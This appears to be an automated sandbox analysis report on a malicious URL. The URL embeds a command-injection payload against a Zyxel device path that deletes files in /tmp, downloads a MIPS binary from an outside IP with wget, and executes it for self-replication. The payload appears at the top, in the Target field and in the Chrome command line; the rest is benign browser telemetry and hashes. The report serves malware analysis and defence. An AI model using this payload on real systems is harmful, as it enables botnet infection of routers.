hxxp://38[.]67[.]1[.]88[:]443/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}hxxp://103[.]110[.]33[.]164/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}[.]/mips${IFS}zyxel[.]selfrep;

Analysis

max time kernel
121s
max time network
123s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
02/11/2023, 20:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://38.67.1.88:443/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://103.110.33.164/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;

Score

1^/10

Malware Config

Signatures

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133434291334055100"	chrome.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1744	chrome.exe
1744	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeCreatePagefilePrivilege	1744	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe
1744	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1744 wrote to memory of 3812	1744	chrome.exe	52
PID 1744 wrote to memory of 3812	1744	chrome.exe	52
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4652	1744	chrome.exe	91
PID 1744 wrote to memory of 4552	1744	chrome.exe	90
PID 1744 wrote to memory of 4552	1744	chrome.exe	90
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89
PID 1744 wrote to memory of 1832	1744	chrome.exe	89

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://38.67.1.88:443/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://103.110.33.164/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdf2799758,0x7ffdf2799768,0x7ffdf2799778
  2⤵
  PID:3812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2236 --field-trial-handle=2052,i,2448868143185987679,12951094017389717979,131072 /prefetch:8
  2⤵
  PID:1832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=2052,i,2448868143185987679,12951094017389717979,131072 /prefetch:8
  2⤵
  PID:4552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1672 --field-trial-handle=2052,i,2448868143185987679,12951094017389717979,131072 /prefetch:2
  2⤵
  PID:4652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2932 --field-trial-handle=2052,i,2448868143185987679,12951094017389717979,131072 /prefetch:1
  2⤵
  PID:1168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2924 --field-trial-handle=2052,i,2448868143185987679,12951094017389717979,131072 /prefetch:1
  2⤵
  PID:4588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3896 --field-trial-handle=2052,i,2448868143185987679,12951094017389717979,131072 /prefetch:1
  2⤵
  PID:4896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4696 --field-trial-handle=2052,i,2448868143185987679,12951094017389717979,131072 /prefetch:1
  2⤵
  PID:4148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5056 --field-trial-handle=2052,i,2448868143185987679,12951094017389717979,131072 /prefetch:8
  2⤵
  PID:3352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3244 --field-trial-handle=2052,i,2448868143185987679,12951094017389717979,131072 /prefetch:8
  2⤵
  PID:1788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4636 --field-trial-handle=2052,i,2448868143185987679,12951094017389717979,131072 /prefetch:1
  2⤵
  PID:3992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=1848 --field-trial-handle=2052,i,2448868143185987679,12951094017389717979,131072 /prefetch:1
  2⤵
  PID:2724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=1248 --field-trial-handle=2052,i,2448868143185987679,12951094017389717979,131072 /prefetch:1
  2⤵
  PID:3324

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:712

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
0f9fbf27cb96d3ae8152712f56f53fc2

SHA1
694ef420eb7a721af2e09e41195c9744ff5b033e

SHA256
5f0cc9b20288868b5b8614eaad9c5938f061df7b2465bb5f577f49498eaf62f9

SHA512
05fc94be4f70d1f9cc6d4047783332eaad4e59cb6009391f260838ea7da610b777927719d1dee2df442a4e42f7eb0eb29a5b6dc9e2016bdaaf054aecdd0a8e6f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
1c496f957f716ff2fbac09d9db69b13a

SHA1
29ed6d2700da8a04715d102a42088e20f0b71ce2

SHA256
715cdf278c5eb5d21aaddef958b67039d8300f4f73f5a9c4c1cfe2a78f5da290

SHA512
28223fd39b5c9771034fbe41a6bf1da95e59f3bf8e475fde41c046660b519f65bb11ecb9b9685737893e3c9364d4aa68c9535a00e952a1a1d6c949fa0b7f6f2d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\db9a3813-1435-48c5-a4c9-bdd07ef44ebf.tmp

Filesize
109KB

MD5
74ac8e3365cc532737e992e673d6a219

SHA1
1de6d51ab52ed33fc60e3861483d5da8965f1aa9

SHA256
45d61b37d87f3088b5bfc4f6bff74175f31a393240c44d81cafd5bb186bbe983

SHA512
8d5cee2f7d26bcf17c5c7cfcc77e782df43a77d667655663ef6f7c3658fae9d5ef91f96a859f7e785479e3e442cf2c16de88fa025a29b0bd964e4f839a1bc2c5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit